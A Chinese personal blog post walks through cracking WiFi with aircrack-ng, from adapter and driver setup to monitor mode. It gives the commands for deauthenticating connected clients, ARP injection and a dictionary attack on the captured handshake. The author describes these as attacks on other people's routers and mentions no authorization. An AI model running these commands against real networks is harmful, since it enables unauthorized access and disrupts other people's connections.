aircrack-ng的使用以及个人苦逼的心路历程

为什么要看关于aircrack-ng的东西呢? 因为可以破开WiFi啊 为什么非要破开WiFi呢? 就是为了装逼 没错!

不开玩笑了啊 进入正题

首先 苦逼的我先看了关于aircrack-ng的资料 不看的话根本就无从入手 了解到了一些基本的使用方法 接着就开始进行自己的试验阶段

这时候第一个问题出现了    放图

既然是无线网络攻击,那肯定就要用无线网卡啊

  however!

没有无线网卡 也就是说虚拟机里面不识别电脑里面自带的网卡

好的 实验到这里就结束了  bye-bye

 

 

我可是学安全的男人啊 怎么可能这样就屈服了  既然无法识别内置的网卡 那就去买一个usb的无线网卡

可是无线网卡那么多 哪一种可以用呢 我就走了弯路 去找了那种有天线的

事实证明 广告完全就是瞎胡扯 首先 这个网卡的驱动不好配 虽然它预置了驱动安装程序 可是安装之后 没有用 物理机识别不了 更不要提虚拟机了 也可能是我没有操作好 反正就是不好用 然后我就去小西门换了 对,在小西门买的 就是图一个可以立即拿到

也没有准备买很好的 但是老板看我小 欺负我长得好看 问我要的贵了一点 看他开店房租那么贵 也就没有计较这些

好,回归正题

这个用的还行 插上虚拟机以后可以识别出来 一定要在VM的虚拟机那个选项里给选上

如果没有安装无线网卡 那么你的声卡下面除了鼠标 键盘 摄像头以外什么都没有 安装之后会有这个 出现usb和wlan

点击连接 我的有两个 但是截图的时候拔掉了网卡 所以有一个 插上之后记得两个都要连接上

接着

可以看到有wlan0了

但是问题又来了 你的无线网卡没有mac地址 没有驱动  这是情况下会出现什么问题呢

就是你拦截不到人家的arp请求包 arp request

我之前没有配 所以抓了二十多万份 里面没有一个请求包 当然了 这种情况可能要两个原因

1 你的无线网卡没有配置好 没有装驱动

2 被害的路由器 固件不行 你death一下 它卡住了

这种情况下 我更愿意去更改自己的配置  这个wifi不行 我还可以袭击下一个啊 可是要是自己的配置不行 那就永远不行

这时候 鲁大师上场了 驱动检测 看一下是什么样的  千万不要给它下载驱动 看一下就可以了

我的是rel 8182eu 知道了就好办了

进入 linux

首先 apt-get update 然后 apt-get upgrade 更新一下源 还有系统软件

源的话 leafpad  /etc/apt/sources.list 打开 选择用国内的源

#阿里云

deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib
deb-src http://mirrors.aliyun.com/kali kali-rolling main non-free contrib


#清华大学
deb http://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free
deb-src https://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free


#浙江大学
deb http://mirrors.zju.edu.cn/kali kali-rolling main contrib non-free

deb-src http://mirrors.zju.edu.cn/kali kali-rolling main contrib non-free

 
  • #kali官方源

  • deb http://http.kali.org/kali kali-rolling main non-free contrib

  • #中科大的源

  • deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib

  • deb http://mirrors.ustc.edu.cn/kali kali-rolling main contrib non-free

  • deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main contrib non-free

  • deb http://mirrors.ustc.edu.cn/kali-security kali-current/updates main contrib non-free

  • deb-src http://mirrors.ustc.edu.cn/kali-security kali-current/updates main contrib non-free

其实没有必要用那么多 用几个就差不多了 我选了阿里云 中科大 浙大 可以适度的增加

都完成以后 就更新一下

接着

apt-get install -y linux-headers-$(uname -r)

这个指令 把headers给下载下来 编译环境需要用

现在思考一下驱动怎么办  需要下载 我在github上找到了

 

 所以就要把它给克隆下来啊 git clone https://github.com/mange/rtl8192eu-linux-driver  rtl8192

cd rtl8192
 sudo make && sudo make install

接着就需要等一会 很快就好了

然后就会发现自己的无线网卡也有了mac 而且袭击的时候可以用macchanger来修改一下mac地址

好的 前期准备工作结束了 工欲善其事,必先利其器

接着就要开始了 

airmon-ng check kill 杀掉所有会妨碍到监听的进程

airmon-ng start wlan0 打开无线网卡

airodump-ng wlan0mon 开始监听

附近的wifi都出现了

上面的各个标志是什么意思 可以自己查一下

接着选定一个wifi

airodump-ng --bssid 路由器的mac -c 所在频道 --ivs -w 抓的包存放的地方

这个是开始专门的抓一个WiFi的包 --ivs可以过滤一些包 抓对自己有用的 这样数据包更小 更方便爆破

不加的话就会抓所有的包 可以看到其他的东西  用来ivs的话 最后的包后缀是ivs 不用的话 cap 应该是这个吧

这时候就开始抓包了

为了得到有效的包 就要开始攻击它 让它发送敏感包 比如一直袭击已经连接上的客户端 让它掉线 只要它掉线了 就会发送登陆请求 这时候就可以抓回来分析了

aireplay-ng  -0 20 -a 路由器的mac -c 客户端的mac wlan0mon

这时候就是death攻击

还有一种arp攻击

aireplay-ng  -3 -b 路由器的mac -h 客户端的mac wlan0mon

arp requset注入攻击 数据包超级多 更好分析

等到

右上角出现 handshake 就可以进行爆破了  按ctrl c 结束

都准备好了以后 开始破解

aircrack-ng -w 字典文件 cap文件

字典文件的话 系统自己带有wordlist cap就是刚才自己抓到的包

 

总结一下吧 很苦逼 遇到了很多问题 但是没有畏惧 遇到了问题就去解决问题 不抱怨 既然选择了远方 便只顾风雨兼程

 

 

 

 
 
 
评论 9
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值